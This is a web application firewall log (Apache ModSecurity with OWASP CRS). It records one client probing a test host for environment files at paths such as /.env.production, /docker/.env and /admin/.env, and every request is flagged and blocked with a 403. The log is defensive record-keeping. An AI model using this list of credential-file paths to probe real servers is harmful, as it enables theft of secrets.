[Fri Dec 05 08:50:24.614742 2025] [:error] [pid 531669] [client 195.178.110.155:44896] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.local"] [unique_id "aTKOwIKEfmkzHJNA4jGpaAAAAGQ"]
[Fri Dec 05 08:50:24.614954 2025] [:error] [pid 531669] [client 195.178.110.155:44896] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.local"] [unique_id "aTKOwIKEfmkzHJNA4jGpaAAAAGQ"]
[Fri Dec 05 08:50:24.646593 2025] [:error] [pid 531669] [client 195.178.110.155:44896] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.production"] [unique_id "aTKOwIKEfmkzHJNA4jGpaQAAAGQ"]
[Fri Dec 05 08:50:24.646827 2025] [:error] [pid 531669] [client 195.178.110.155:44896] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.production"] [unique_id "aTKOwIKEfmkzHJNA4jGpaQAAAGQ"]
[Fri Dec 05 08:50:24.647055 2025] [:error] [pid 531669] [client 195.178.110.155:44896] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.production"] [unique_id "aTKOwIKEfmkzHJNA4jGpaQAAAGQ"]
[Fri Dec 05 08:50:24.683833 2025] [:error] [pid 531669] [client 195.178.110.155:44896] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /conf/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/conf/.env"] [unique_id "aTKOwIKEfmkzHJNA4jGpagAAAGQ"]
[Fri Dec 05 08:50:24.684075 2025] [:error] [pid 531669] [client 195.178.110.155:44896] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/conf/.env"] [unique_id "aTKOwIKEfmkzHJNA4jGpagAAAGQ"]
[Fri Dec 05 08:50:24.684270 2025] [:error] [pid 531669] [client 195.178.110.155:44896] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/conf/.env"] [unique_id "aTKOwIKEfmkzHJNA4jGpagAAAGQ"]
[Fri Dec 05 08:50:24.714669 2025] [:error] [pid 531669] [client 195.178.110.155:44896] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/www/.env"] [unique_id "aTKOwIKEfmkzHJNA4jGpawAAAGQ"]
[Fri Dec 05 08:50:24.714935 2025] [:error] [pid 531669] [client 195.178.110.155:44896] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/www/.env"] [unique_id "aTKOwIKEfmkzHJNA4jGpawAAAGQ"]
[Fri Dec 05 08:50:24.715161 2025] [:error] [pid 531669] [client 195.178.110.155:44896] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/www/.env"] [unique_id "aTKOwIKEfmkzHJNA4jGpawAAAGQ"]
[Fri Dec 05 08:50:27.608922 2025] [:error] [pid 531700] [client 195.178.110.155:44898] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aTKOw_jYAO6Jy5EVgXUuiQAAAIM"]
[Fri Dec 05 08:50:27.609161 2025] [:error] [pid 531700] [client 195.178.110.155:44898] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aTKOw_jYAO6Jy5EVgXUuiQAAAIM"]
[Fri Dec 05 08:50:27.609365 2025] [:error] [pid 531700] [client 195.178.110.155:44898] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aTKOw_jYAO6Jy5EVgXUuiQAAAIM"]
[Fri Dec 05 08:50:27.635410 2025] [:error] [pid 531700] [client 195.178.110.155:44898] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/app/.env"] [unique_id "aTKOw_jYAO6Jy5EVgXUuigAAAIM"]
[Fri Dec 05 08:50:27.635753 2025] [:error] [pid 531700] [client 195.178.110.155:44898] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/app/.env"] [unique_id "aTKOw_jYAO6Jy5EVgXUuigAAAIM"]
[Fri Dec 05 08:50:27.636038 2025] [:error] [pid 531700] [client 195.178.110.155:44898] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/app/.env"] [unique_id "aTKOw_jYAO6Jy5EVgXUuigAAAIM"]
[Fri Dec 05 08:50:27.709196 2025] [:error] [pid 531700] [client 195.178.110.155:44898] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.vscode/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.vscode/.env"] [unique_id "aTKOw_jYAO6Jy5EVgXUuiwAAAIM"]
[Fri Dec 05 08:50:27.709580 2025] [:error] [pid 531700] [client 195.178.110.155:44898] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.vscode/.env"] [unique_id "aTKOw_jYAO6Jy5EVgXUuiwAAAIM"]
[Fri Dec 05 08:50:27.709850 2025] [:error] [pid 531700] [client 195.178.110.155:44898] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.vscode/.env"] [unique_id "aTKOw_jYAO6Jy5EVgXUuiwAAAIM"]
[Fri Dec 05 08:50:27.739772 2025] [:error] [pid 531700] [client 195.178.110.155:44898] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /js/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/js/.env"] [unique_id "aTKOw_jYAO6Jy5EVgXUujAAAAIM"]
[Fri Dec 05 08:50:27.740052 2025] [:error] [pid 531700] [client 195.178.110.155:44898] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/js/.env"] [unique_id "aTKOw_jYAO6Jy5EVgXUujAAAAIM"]
[Fri Dec 05 08:50:27.740272 2025] [:error] [pid 531700] [client 195.178.110.155:44898] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/js/.env"] [unique_id "aTKOw_jYAO6Jy5EVgXUujAAAAIM"]
[Fri Dec 05 08:50:49.438456 2025] [:error] [pid 531697] [client 195.178.110.155:40396] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /main/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/main/.env"] [unique_id "aTKO2eqgQSN2J6Cu49vRLgAAAIA"]
[Fri Dec 05 08:50:49.438710 2025] [:error] [pid 531697] [client 195.178.110.155:40396] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/main/.env"] [unique_id "aTKO2eqgQSN2J6Cu49vRLgAAAIA"]
[Fri Dec 05 08:50:49.438900 2025] [:error] [pid 531697] [client 195.178.110.155:40396] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/main/.env"] [unique_id "aTKO2eqgQSN2J6Cu49vRLgAAAIA"]
[Fri Dec 05 08:50:49.774866 2025] [:error] [pid 531697] [client 195.178.110.155:40396] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aTKO2eqgQSN2J6Cu49vRLwAAAIA"]
[Fri Dec 05 08:50:49.775111 2025] [:error] [pid 531697] [client 195.178.110.155:40396] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aTKO2eqgQSN2J6Cu49vRLwAAAIA"]
[Fri Dec 05 08:50:49.775323 2025] [:error] [pid 531697] [client 195.178.110.155:40396] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aTKO2eqgQSN2J6Cu49vRLwAAAIA"]
[Fri Dec 05 08:50:49.868572 2025] [:error] [pid 531697] [client 195.178.110.155:40396] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /website/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/website/.env"] [unique_id "aTKO2eqgQSN2J6Cu49vRMQAAAIA"]
[Fri Dec 05 08:50:49.868807 2025] [:error] [pid 531697] [client 195.178.110.155:40396] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/website/.env"] [unique_id "aTKO2eqgQSN2J6Cu49vRMQAAAIA"]
[Fri Dec 05 08:50:49.868997 2025] [:error] [pid 531697] [client 195.178.110.155:40396] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/website/.env"] [unique_id "aTKO2eqgQSN2J6Cu49vRMQAAAIA"]
[Fri Dec 05 08:50:49.894169 2025] [:error] [pid 531697] [client 195.178.110.155:40396] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /development/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "aTKO2eqgQSN2J6Cu49vRMgAAAIA"]
[Fri Dec 05 08:50:49.894449 2025] [:error] [pid 531697] [client 195.178.110.155:40396] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "aTKO2eqgQSN2J6Cu49vRMgAAAIA"]
[Fri Dec 05 08:50:49.894686 2025] [:error] [pid 531697] [client 195.178.110.155:40396] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "aTKO2eqgQSN2J6Cu49vRMgAAAIA"]
[Fri Dec 05 08:50:49.920331 2025] [:error] [pid 531697] [client 195.178.110.155:40396] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aTKO2eqgQSN2J6Cu49vRMwAAAIA"]
[Fri Dec 05 08:50:49.920590 2025] [:error] [pid 531697] [client 195.178.110.155:40396] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aTKO2eqgQSN2J6Cu49vRMwAAAIA"]
[Fri Dec 05 08:50:49.920806 2025] [:error] [pid 531697] [client 195.178.110.155:40396] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aTKO2eqgQSN2J6Cu49vRMwAAAIA"]
[Fri Dec 05 08:50:50.105229 2025] [:error] [pid 531697] [client 195.178.110.155:40396] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /crm/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/crm/.env"] [unique_id "aTKO2uqgQSN2J6Cu49vRNAAAAIA"]
[Fri Dec 05 08:50:50.105502 2025] [:error] [pid 531697] [client 195.178.110.155:40396] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/crm/.env"] [unique_id "aTKO2uqgQSN2J6Cu49vRNAAAAIA"]
[Fri Dec 05 08:50:50.105743 2025] [:error] [pid 531697] [client 195.178.110.155:40396] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/crm/.env"] [unique_id "aTKO2uqgQSN2J6Cu49vRNAAAAIA"]
